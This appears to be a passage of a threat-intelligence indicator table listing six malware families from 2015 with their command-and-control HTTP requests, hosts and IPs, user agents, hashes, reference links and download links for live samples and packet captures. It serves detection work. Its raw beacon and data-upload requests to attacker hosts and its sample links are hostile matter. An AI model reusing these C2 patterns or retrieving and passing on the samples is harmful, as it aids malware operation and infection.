350 | 2015-02-09 | CRIME | Linux Tsunami DDoS bot | POST | / | / | GET /%s HTTP/1.0 Connection: Keep-Alive User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) | Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) | 80 | bc8134f3eb3f1d4c19a98fc1eedce533 | http://bit.ly/crimesamples | ||||||
351 | 2015-02-09 | CRIME | Scudy Worm | GET | <p> /online.php?c=dGVxdWlsYWJvb21ib29t&u =amFuZXR0ZWRvZQ%3D %3D&v =1&s=74642e 421f40ff08ff4f 2cffff6d1155& p=MTAuMC4yLjE1&t=1&hi=1ewck5fk4e <p> /en/us/defualt.aspx | <p> /online.php?c= <p> /en/us/defualt.aspx | GET /online.php?c=dGVxdWlsYWJvb21ib29t&u=amFuZXR0ZWRvZQ%3D%3D&v=1&s=74642e421f40ff08ff4f2cffff6d1155&p=MTAuMC4yLjE1&t=1&hi=1ewck5fk4e HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; ) Accept: */* Host: theworldnews.byethost5.com | Mozilla/4.0 (compatible; ) | 80 | http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_scudy.sma | |||||||
352 | 2015-02-12 | CRIME | Trojan Ropest | GET | /pgt/?ver=1.3.3753&id=125&r=4834765&os=6.2\|2\|11.0.9600.17631&res=4\|3984\|359&f=1 | /pgt/?ver= | GET /pgt/?ver=1.3.3753&id=125&r=4834765&os=6.2\|2\|11.0.9600.17631&res=4\|3984\|359&f=1 HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-mfe-ipt, */* Accept-Language: en-US Accept-Asterope: true User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 89.144.2.20:8080 Connection: Keep-Alive | Accept-Asterope: true User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko | http://stopmalvertising.com/malware-reports/analysis-of-asterope/network-activity.html | ||||||||
353 | 2015-05-24 | CRIME | Dircrypt.A | POST | <p> / | <p> / | POST / HTTP/1.1 Host: gowfrfmxojdqvh.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE) Content-Type: multipart/form-data; boundary=zwAtguAEVnxnhrVRyhtZ Content-Length: 100 Accept-Language: en-us Accept: text/html, application/xml;q=0.9, application/xhtml+xml;q=0.9, image/png, image/jpeg, image/gif, image/x-xbitmap, *\\*;q=0.1 Accept-Charset: utf-8, utf-16;q=0.6, *;q=0.1 Pragma: no-cache Connection: close | Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE) | 80 | https://www.virustotal.com/en/file/c795d79747b3bd0dbece3212c1653269e763dcb3032c29469a4caef50740fab5/analysis/ | |||||||
354 | 2015-05-24 | MOBILE | Android Proxy | POST | /proxy/log.php?id=<gmailid@gmail.com | /proxy/log.php?id= | POST /proxy/log.php?id=<gmailid@gmail.com HTTP/1.1 | 80 | http://b0n1.blogspot.com/2015/04/android-trojan-spy-goes-2-years.html?spref=tw | http://contagiominidump.blogspot.com/2015/05/android-proxy-trojan-sample.html | |||||||
355 | 2015-05-24 | CRIME | Hyteod / Dynamer | POST | /upload.php | /upload.php | POST http://b14-mini.ru/upload.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: b14-mini.ru Content-Length: 256 Pragma: no-cache JG1G3pM7VlUrVGbXKRo8T4XCWR2ZZrtOts4Xd7zMEx35yLhp0qrtioTY61cPiNwNLl0N8jX0Fwsn1t+diJ7BiyxG6yt8yVVroVv/OoZg5XgZfpRbH217epr8OGBf5BKSuypiLtNx+mXFJHLmcqwyT1sVVCbr96Eht0QeHCKfqQBy5IiBZ8PkB3dlRLVEaEDRWftEaL+djp0AZ7gB2Jj6pOu6xmr14/LYh7lrbBTVsEbG6CC3+Cb0RR2n4El9YwBG | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | 80 | Fiesta EK Payload | fd0ff4992247bbcc2bde6379e10c1499 | https://www.virustotal.com/en/file/e969060815fbdcba6d2ff34dc8f38821454b3cc473e023a2fe3912f150ff6d3b/analysis/ <p> https://blog.malwarebytes.org/exploits-2/2015/05/fiesta-ek-wreaks-havoc-on-popular-torrent-site/ | http://www.mediafire.com/download/0sc3fuaofpldpp8/Hyteod_Dynamer-samp.zip | http://www.mediafire.com/download/idd20ndgrkon4l2/BIN_fd0ff4992247bbcc2bde6379e10c1499_Hyteod-pcap.zip | d:\YuIC\pBmMYPSq\raSsKqliUnwMVBOiIVMJPVyMjYlj\QIWWDJyFoALsJmZgQTUmT\zoqpFWvG\eysOgnVB\oxW\Uhk\SDhdCpa\cAJJvprDKokHgyixaghSQof.pdb |